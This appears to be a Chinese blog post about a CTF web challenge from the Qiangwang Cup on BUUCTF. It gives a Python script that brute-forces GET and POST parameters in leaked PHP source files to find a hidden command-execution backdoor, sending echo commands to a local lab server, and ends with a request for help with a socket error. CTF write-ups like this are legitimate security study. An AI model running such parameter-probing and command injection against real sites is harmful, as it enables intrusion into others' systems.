BUUCTF/强网杯 高明的黑客

访问/www.tar.gz得到源代码
参考了别人的writeup,用wamp或者phpstudy搭建本地环境本地跑一下
基本原理是暴力破解,把每个文件里可能成为真正参数的参数都跑一下,直到发现那个可以访问的参数为止
那么如何测试?
对于get:构造?[参数]=echo "xxx"
对于post:构造data:{[参数]:=echo"xxx"}

import os
import re
import requests as r

files = os.listdir(r'C:\wamp\www\src')
method = re.compile(r"\$_[GEPOST]{3,4}\[.*\]")#$_[GEPOST]{3,4}[.*]
print(method)
flag = 0
for i in files:
    p = 'C:\\wamp\\www\\src\\' + i
    content = open(p, 'r', encoding='UTF-8').read()
    #print(i)
    #print(content)
    print('*' * 20 + i + '*' * 20)
    gepost = method.findall(content)
    #print(gepost)
    url = 'http://127.0.0.1/src/'
    cmd = '=echo "cryscat";'
    for j in gepost:
        if 'GET' in j:
            pdget = re.findall(r"'(.*)'", j)[0]
            urlg = url + i + '?' + pdget + cmd
            #print(urlg)
            res = r.get(urlg)
            print('------> ' + pdget)
            if 'cryscat' in res.text:
                print('Success!!! ------> ' + urlg)
                flag = 1
                break
        if 'POST' in j:
            pdpost = re.findall(r"'(.*)'", j)[0]
            data = {
                pdpost: cmd
            }
            urlp = url + i
            #print(urlp)
            res = r.post(urlp, data=data)
            print('------> ' + pdpost)
            if 'cryscat' in res.text:
                print('Success!!! ------> ' + urlp + '  ' + data)
                flag = 1
                break

    if flag == 1:
        break

代码应该没问题,但是从报错

Traceback (most recent call last):
  File "C:\Python36\lib\site-packages\urllib3\connection.py", line 141, in _new_conn
    (self.host, self.port), self.timeout, **extra_kw)
  File "C:\Python36\lib\site-packages\urllib3\util\connection.py", line 83, in create_connection
    raise err
  File "C:\Python36\lib\site-packages\urllib3\util\connection.py", line 73, in create_connection
    sock.connect(sa)
OSError: [WinError 10048] 通常每个套接字地址(协议/网络地址/端口)只允许使用一次。

找了一圈也没解决,linux下没有测试,求大佬帮助。

参考文章:
https://hachp1.github.io/posts/Web%E5%AE%89%E5%85%A8/20190530-19qwb.html
https://blog.csdn.net/qq_26406447/article/details/90690453
https://mochazz.github.io/2019/05/27/2019%E5%BC%BA%E7%BD%91%E6%9D%AFWeb%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/
http://cdusec.happyhacking.top/?post=77
https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2

你可能感兴趣的:(BUUCTF/强网杯 高明的黑客)